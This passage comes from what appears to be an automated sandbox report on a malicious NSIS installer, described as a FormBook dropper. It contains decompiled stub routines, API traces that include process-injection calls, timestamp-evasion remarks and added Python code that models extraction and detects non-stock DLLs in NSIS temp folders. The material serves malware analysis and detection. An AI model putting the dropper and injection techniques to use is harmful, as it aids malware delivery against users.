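Added example for this page; not code from the report or from NSIS.
Mode names follow the NSIS SetOverwrite documentation (assumption).
"""
from dataclasses import dataclass
from typing import Optional

# Win32 constants used by the decompiled listing.
GENERIC_WRITE = 0x40000000
CREATE_NEW = 1          # fail if the target already exists
CREATE_ALWAYS = 2       # truncate/overwrite an existing target
FILE_ATTRIBUTE_READONLY = 0x1

# SetOverwrite modes in the low three bits of parm0 ('& 0x00000007').
OVERWRITE_ON, OVERWRITE_OFF, OVERWRITE_TRY, OVERWRITE_IFNEWER, OVERWRITE_IFDIFF = range(5)


@dataclass
class ExtractPlan:
    mode: int                # effective mode after timestamp resolution
    clear_readonly: bool     # GetFileAttributesA / SetFileAttributesA(attr & 0xFE)
    create_disposition: int  # CREATE_NEW if mode == OVERWRITE_OFF else CREATE_ALWAYS
    on_open_failure: str     # what the stub does when the open fails
    messagebox_flags: int    # parm0 >> 3, handed to the message-box routine (not decoded here)


def resolve_mode(mode: int, existing_mtime: Optional[int], new_mtime: int) -> int:
    """Collapse ifnewer/ifdiff (mode >= 3) to on/off using file times.

    existing_mtime is None when the target does not exist; times are
    FILETIME-like integers, ordered as CompareFileTime(existing, new) would
    order them. Documented semantics (assumption): ifnewer overwrites only if
    the packed file is newer, ifdiff overwrites whenever the times differ.
    """
    if mode < OVERWRITE_IFNEWER:
        return mode
    if existing_mtime is None:
        return OVERWRITE_ON                  # nothing on disk to protect
    if mode == OVERWRITE_IFNEWER:
        return OVERWRITE_ON if new_mtime > existing_mtime else OVERWRITE_OFF
    return OVERWRITE_ON if new_mtime != existing_mtime else OVERWRITE_OFF


def plan_extract(parm0: int, existing_mtime: Optional[int], new_mtime: int) -> ExtractPlan:
    """Mirror the branch structure of the listing for one File instruction."""
    mode = resolve_mode(parm0 & 0x7, existing_mtime, new_mtime)
    # Only unconditional overwrite clears FILE_ATTRIBUTE_READONLY first, so a
    # read-only target never blocks an 'on' extraction.
    clear_readonly = mode == OVERWRITE_ON
    disposition = CREATE_NEW if mode == OVERWRITE_OFF else CREATE_ALWAYS
    if mode == OVERWRITE_ON:
        failure = "dialog: retry/ignore/abort"   # E004052BF(...) - 4 (IDRETRY) in the listing
    elif mode == OVERWRITE_TRY:
        failure = "skip, exec_error++"           # *0x7a3008 incremented when mode == 2
    else:
        failure = "skip"
    return ExtractPlan(mode, clear_readonly, disposition, failure, parm0 >> 3)
```

Forensic caveat that follows from the `SetFileTime` call at the end of the listing: the dropped file's $STANDARD_INFORMATION creation and last-write times are set from the value packed into the installer, not from the moment of extraction, so "recently modified" triage misses these files; rely on $FILE_NAME times, the USN journal or the directory's own timestamps instead.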
                                                                        Instruction addresses for the listing above: 0x0040179D - 0x00401946 (main body), with out-of-line blocks at 0x00401495, 0x004015CA, 0x0040228E, 0x00402293, 0x004026DA and 0x0040292F - 0x0040293E.

                                                                        APIs
                                                                        • lstrcatA.KERNEL32(00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
                                                                        • CompareFileTime.KERNEL32(-00000014,?,Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
                                                                        • GetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
                                                                        • SetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,00000000), ref: 00401833
                                                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
                                                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll$Ivlfdpdlcleoxmzl
                                                                        • API String ID: 1152937526-2160361936
                                                                        • Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                        • Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
                                                                        • Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                        • Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

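The String ID above records where this extraction handler wrote: `C:\Users\jones\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll`, an NSIS per-run plugin directory (`ns` prefix plus a letter and four hex digits, `.tmp`) holding a DLL that is not one of the plugins shipped with NSIS. That is the usual shape of an NSIS-wrapped FormBook dropper: the installer-specific DLL is loaded from the temp directory and does the real work. The Python below is an added detection example for this page, not code from the report or from any tool it names. The event records are constructed to resemble Sysmon EventID 11 (FileCreate) and 7 (ImageLoad) fields; the `nsa82C7.tmp\fsfomt.dll` path is the one from the listing, the process IDs, the second process and its paths are made up, and the stock-plugin allowlist is an assumption to extend for your environment.

```python
"""Flag non-stock DLLs dropped into an NSIS ns????.tmp directory and then
loaded by the same process. Added example for this page; the events below
are constructed, not taken from the report.
"""
import re
from collections import defaultdict

# NSIS unpacks plugins to %TEMP%\ns<letter><4 hex>.tmp, e.g. nsa82C7.tmp.
NSIS_PLUGIN_DIR = re.compile(
    r"\\AppData\\Local\\Temp\\(?P<dir>ns[0-9a-z]{4,5}\.tmp)\\(?P<dll>[^\\]+\.dll)$",
    re.IGNORECASE,
)

# Plugins that ship with NSIS itself (assumption: stock set, lowercase).
STOCK_PLUGINS = {
    "system.dll", "nsexec.dll", "installoptions.dll", "nsdialogs.dll",
    "startmenu.dll", "userinfo.dll", "nsisdl.dll", "splash.dll",
    "advsplash.dll", "banner.dll", "bgimage.dll", "dialer.dll",
    "langdll.dll", "math.dll", "typelib.dll", "vpatch.dll",
}


def classify(path):
    """Return (plugin_dir, dll_name) if path is inside an NSIS plugin dir."""
    m = NSIS_PLUGIN_DIR.search(path)
    return (m.group("dir"), m.group("dll")) if m else None


def find_nonstock_plugin_loads(events):
    """events: iterable of dicts with Sysmon-like keys.

    A finding is an ImageLoad of a DLL from an ns????.tmp directory whose name
    is not a stock plugin; dropped_by_same_process records whether the loading
    process also created that file (the drop-then-load pattern).
    """
    created = defaultdict(set)   # (pid, dir.lower()) -> {dll.lower()}
    findings = []
    for ev in events:
        if ev["EventID"] == 11:
            hit = classify(ev["TargetFilename"])
            if hit:
                created[(ev["ProcessId"], hit[0].lower())].add(hit[1].lower())
        elif ev["EventID"] == 7:
            hit = classify(ev["ImageLoaded"])
            if not hit or hit[1].lower() in STOCK_PLUGINS:
                continue
            findings.append({
                "pid": ev["ProcessId"],
                "image": ev["Image"],
                "dir": hit[0],
                "dll": hit[1],
                "dropped_by_same_process":
                    hit[1].lower() in created[(ev["ProcessId"], hit[0].lower())],
            })
    return findings


# Constructed sample: the sample's own process drops and loads fsfomt.dll
# alongside the stock System.dll; a second, unrelated installer only uses nsExec.dll.
SAMPLE = r"C:\Users\jones\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe"
OTHER = r"C:\Users\jones\Downloads\some-setup.exe"
SAMPLE_EVENTS = [
    {"EventID": 11, "ProcessId": 4120, "Image": SAMPLE,
     "TargetFilename": r"C:\Users\jones\AppData\Local\Temp\nsa82C7.tmp\System.dll"},
    {"EventID": 11, "ProcessId": 4120, "Image": SAMPLE,
     "TargetFilename": r"C:\Users\jones\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll"},
    {"EventID": 7, "ProcessId": 4120, "Image": SAMPLE,
     "ImageLoaded": r"C:\Users\jones\AppData\Local\Temp\nsa82C7.tmp\System.dll"},
    {"EventID": 7, "ProcessId": 4120, "Image": SAMPLE,
     "ImageLoaded": r"C:\Users\jones\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll"},
    {"EventID": 11, "ProcessId": 5008, "Image": OTHER,
     "TargetFilename": r"C:\Users\jones\AppData\Local\Temp\nsx1A2B.tmp\nsExec.dll"},
    {"EventID": 7, "ProcessId": 5008, "Image": OTHER,
     "ImageLoaded": r"C:\Users\jones\AppData\Local\Temp\nsx1A2B.tmp\nsExec.dll"},
]

if __name__ == "__main__":
    for f in find_nonstock_plugin_loads(SAMPLE_EVENTS):
        print(f)
```

The allowlist keeps benign NSIS installers quiet; the signal is a DLL with a non-stock name being loaded from the plugin directory, and the drop-then-load flag ties it back to the installer process so the finding can be joined with the suspended-process creation and injection signatures listed at the top of this report.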
                                                                        C-Code - Quality: 95%
                                                                        			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                                                        				struct _OVERLAPPED* _v8;
                                                                        				long _v12;
                                                                        				void* _v16;
                                                                        				long _v20;
                                                                        				long _v24;
                                                                        				intOrPtr _v28;
                                                                        				char _v92;
                                                                        				void* _t68;
                                                                        				void* _t69;
                                                                        				int _t74;
                                                                        				long _t75;
                                                                        				intOrPtr _t79;
                                                                        				long _t80;
                                                                        				void* _t82;
                                                                        				int _t84;
                                                                        				void* _t99;
                                                                        				void* _t100;
                                                                        				long _t101;
                                                                        				int _t102;
                                                                        				long _t103;
                                                                        				int _t104;
                                                                        				intOrPtr _t105;
                                                                        				long _t106;
                                                                        				void* _t107;
                                                                        
                                                                        				_t102 = _a16;
                                                                        				_t99 = _a12;
                                                                        				_v12 = _t102;
                                                                        				if(_t99 == 0) {
                                                                        					_v12 = 0x8000;
                                                                        				}
                                                                        				_v8 = 0;
                                                                        				_v16 = _t99;
                                                                        				if(_t99 == 0) {
                                                                        					_v16 = 0x78d938;
                                                                        				}
                                                                        				_t66 = _a4;
                                                                        				if(_a4 >= 0) {
                                                                        					E004030FF( *0x7a2fd8 + _t66);
                                                                        				}
                                                                        				_t68 = E004030CD( &_a16, 4); // executed
                                                                        				if(_t68 == 0) {
                                                                        					L44:
                                                                        					_push(0xfffffffd);
                                                                        					goto L45;
                                                                        				} else {
                                                                        					if((_a19 & 0x00000080) == 0) {
                                                                        						if(_t99 != 0) {
                                                                        							if(_a16 < _t102) {
                                                                        								_t102 = _a16;
                                                                        							}
                                                                        							if(E004030CD(_t99, _t102) != 0) {
                                                                        								_v8 = _t102;
                                                                        								L47:
                                                                        								return _v8;
                                                                        							} else {
                                                                        								goto L44;
                                                                        							}
                                                                        						}
                                                                        						if(_a16 <= 0) {
                                                                        							goto L47;
                                                                        						}
                                                                        						while(1) {
                                                                        							_t103 = _v12;
                                                                        							if(_a16 < _t103) {
                                                                        								_t103 = _a16;
                                                                        							}
                                                                        							if(E004030CD(0x789938, _t103) == 0) {
                                                                        								goto L44;
                                                                        							}
                                                                        							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed
                                                                        							if(_t74 == 0 || _t103 != _a12) {
                                                                        								L30:
                                                                        								_push(0xfffffffe);
                                                                        								L45:
                                                                        								_pop(_t69);
                                                                        								return _t69;
                                                                        							} else {
                                                                        								_v8 = _v8 + _t103;
                                                                        								_a16 = _a16 - _t103;
                                                                        								if(_a16 > 0) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L47;
                                                                        							}
                                                                        						}
                                                                        						goto L44;
                                                                        					}
                                                                        					_t75 = GetTickCount();
                                                                        					_t13 =  &_a16;
                                                                        					 *_t13 = _a16 & 0x7fffffff;
                                                                        					_v20 = _t75;
                                                                        					 *0x40b038 = 0xb;
                                                                        					 *0x40b050 = 0;
                                                                        					_a4 = _a16;
                                                                        					if( *_t13 <= 0) {
                                                                        						goto L47;
                                                                        					}
                                                                        					while(1) {
                                                                        						L10:
                                                                        						_t104 = 0x4000;
                                                                        						if(_a16 < 0x4000) {
                                                                        							_t104 = _a16;
                                                                        						}
                                                                        						if(E004030CD(0x789938, _t104) == 0) {
                                                                        							goto L44;
                                                                        						}
                                                                        						_a16 = _a16 - _t104;
                                                                        						 *0x40b028 = 0x789938;
                                                                        						 *0x40b02c = _t104;
                                                                        						while(1) {
                                                                        							_t100 = _v16;
                                                                        							 *0x40b030 = _t100;
                                                                        							 *0x40b034 = _v12;
                                                                        							_t79 = E00405D9D(0x40b028);
                                                                        							_v28 = _t79;
                                                                        							if(_t79 < 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t105 =  *0x40b030; // 0x78ed38
                                                                        							_t106 = _t105 - _t100;
                                                                        							_t80 = GetTickCount();
                                                                        							_t101 = _t80;
                                                                        							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                                                        								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                        								_t107 = _t107 + 0xc;
                                                                        								E00404D62(0,  &_v92);
                                                                        								_v20 = _t101;
                                                                        							}
                                                                        							if(_t106 == 0) {
                                                                        								if(_a16 > 0) {
                                                                        									goto L10;
                                                                        								}
                                                                        								goto L47;
                                                                        							} else {
                                                                        								if(_a12 != 0) {
                                                                        									_v12 = _v12 - _t106;
                                                                        									_v8 = _v8 + _t106;
                                                                        									_t82 =  *0x40b030; // 0x78ed38
                                                                        									_v16 = _t82;
                                                                        									if(_v12 < 1) {
                                                                        										goto L47;
                                                                        									}
                                                                        									L25:
                                                                        									if(_v28 != 4) {
                                                                        										continue;
                                                                        									}
                                                                        									goto L47;
                                                                        								}
                                                                        								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                                                        								if(_t84 == 0 || _v24 != _t106) {
                                                                        									goto L30;
                                                                        								} else {
                                                                        									_v8 = _v8 + _t106;
                                                                        									goto L25;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_push(0xfffffffc);
                                                                        						goto L45;
                                                                        					}
                                                                        					goto L44;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00402F1F
                                                                        • GetTickCount.KERNEL32 ref: 00402FA6
                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
                                                                        • wsprintfA.USER32 ref: 00402FE3
                                                                        • WriteFile.KERNELBASE(00000000,00000000,0078ED38,7FFFFFFF,00000000), ref: 00403011
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CountTick$FileWritewsprintf
                                                                        • String ID: ... %d%%$8x
                                                                        • API String ID: 4209647438-795837185
                                                                        • Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                        • Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
                                                                        • Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                        • Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 026C14D6
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 026C152F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656919763.00000000026C0000.00000040.00000001.sdmp, Offset: 026C0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AllocCreateFileVirtual
                                                                        • String ID: cc518e35fee648519f184090ec306ce4
                                                                        • API String ID: 1475775534-3371687070
                                                                        • Opcode ID: a4fb99792ff7ce8f09e5c46e9998f1ef9031e9a3d21052d9d41ff5d137be9c8d
                                                                        • Instruction ID: ba1df1ff393a6e6ddb6def2f0cd73c4a5f808391e7d422c330060c611843b076
                                                                        • Opcode Fuzzy Hash: a4fb99792ff7ce8f09e5c46e9998f1ef9031e9a3d21052d9d41ff5d137be9c8d
                                                                        • Instruction Fuzzy Hash: 75D14D30D44388EEEF21EBE4DC05BEDBBB5AF05714F20409AE608BA191D7B50B85DB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 026C082F
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 026C09FC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656919763.00000000026C0000.00000040.00000001.sdmp, Offset: 026C0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateFileFreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 204039940-0
                                                                        • Opcode ID: 6f3f5e3b86818eddb0a36baf9cd20a3296fd23fd6fb6ece333fab61561e8762a
                                                                        • Instruction ID: 60db3a196d955138b51fd156ab63b137695d87fd17490a320a117e758144ddfa
                                                                        • Opcode Fuzzy Hash: 6f3f5e3b86818eddb0a36baf9cd20a3296fd23fd6fb6ece333fab61561e8762a
                                                                        • Instruction Fuzzy Hash: 20A1FE70D00209EFEF14EBE4C885BBDBBB1EF08315F20849AE515BA2A1D3755A51DF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
                                                                        				int _t19;
                                                                        				struct _SECURITY_ATTRIBUTES* _t20;
                                                                        				signed char _t22;
                                                                        				struct _SECURITY_ATTRIBUTES* _t23;
                                                                        				CHAR* _t25;
                                                                        				struct _SECURITY_ATTRIBUTES** _t27;
                                                                        				struct _SECURITY_ATTRIBUTES** _t29;
                                                                        				void* _t30;
                                                                        
                                                                        				_t23 = __ebx;
                                                                        				_t25 = E00402A9A(0xfffffff0);
                                                                        				_t27 = E0040555F(_t25);
                                                                        				if( *_t25 != __ebx && _t27 != __ebx) {
                                                                        					do {
                                                                        						_t29 = E004054F7(_t27, 0x5c);
                                                                        						 *_t29 = _t23;
                                                                        						 *((char*)(_t30 + 0xb)) =  *_t29;
                                                                        						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                                                        						if(_t19 == 0) {
                                                                        							if(GetLastError() != 0xb7) {
                                                                        								L5:
                                                                        								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                                                        							} else {
                                                                        								_t22 = GetFileAttributesA(_t25); // executed
                                                                        								if((_t22 & 0x00000010) == 0) {
                                                                        									goto L5;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                                        						 *_t29 = _t20;
                                                                        						_t27 =  &(_t29[0]);
                                                                        					} while (_t20 != _t23);
                                                                        				}
                                                                        				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                                                        					_push(0xfffffff5);
                                                                        					E00401428();
                                                                        				} else {
                                                                        					E00401428(0xffffffe6);
                                                                        					E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
                                                                        					SetCurrentDirectoryA(_t25); // executed
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 0040556D
                                                                          • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
                                                                          • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581
                                                                        • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
                                                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                        • API String ID: 3751793516-47812868
                                                                        • Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                        • Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
                                                                        • Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                        • Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                        				signed int _t11;
                                                                        				int _t14;
                                                                        				signed int _t16;
                                                                        				void* _t19;
                                                                        				CHAR* _t20;
                                                                        
                                                                        				_t20 = _a4;
                                                                        				_t19 = 0x64;
                                                                        				while(1) {
                                                                        					_t19 = _t19 - 1;
                                                                        					_a4 = 0x61736e;
                                                                        					_t11 = GetTickCount();
                                                                        					_t16 = 0x1a;
                                                                        					_a6 = _a6 + _t11 % _t16;
                                                                        					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                                        					if(_t14 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(_t19 != 0) {
                                                                        						continue;
                                                                        					}
                                                                        					 *_t20 =  *_t20 & 0x00000000;
                                                                        					return _t14;
                                                                        				}
                                                                        				return _t20;
                                                                        			}

                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 004056D2
                                                                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 004056EC
                                                                        Strings
                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2
                                                                        • nsa, xrefs: 004056CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                                                        • API String ID: 1716503409-3657371456
                                                                        • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                        • Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
                                                                        • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                        • Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 026C039B
                                                                        • GetThreadContext.KERNELBASE(?,00010007), ref: 026C03BE
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 026C03E2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656919763.00000000026C0000.00000040.00000001.sdmp, Offset: 026C0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThread
                                                                        • String ID:
                                                                        • API String ID: 2411489757-0
                                                                        • Opcode ID: 9ab192a0ab5d112922a86b347ba533257f927993b616088db38f28ece6ad4bc7
                                                                        • Instruction ID: 306b9d6b28607cb4c2d3ef3f604753cb8a5dbd636911dd84da8f002afa896eb8
                                                                        • Opcode Fuzzy Hash: 9ab192a0ab5d112922a86b347ba533257f927993b616088db38f28ece6ad4bc7
                                                                        • Instruction Fuzzy Hash: F8322431E40258EEEB24EFA4DC45BBDB7B5EF08704F20409AE619FA2A0D7715A81CF15
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 73%
                                                                        			E0040136D(signed int _a4) {
                                                                        				intOrPtr* _t8;
                                                                        				int _t10;
                                                                        				signed int _t12;
                                                                        				int _t13;
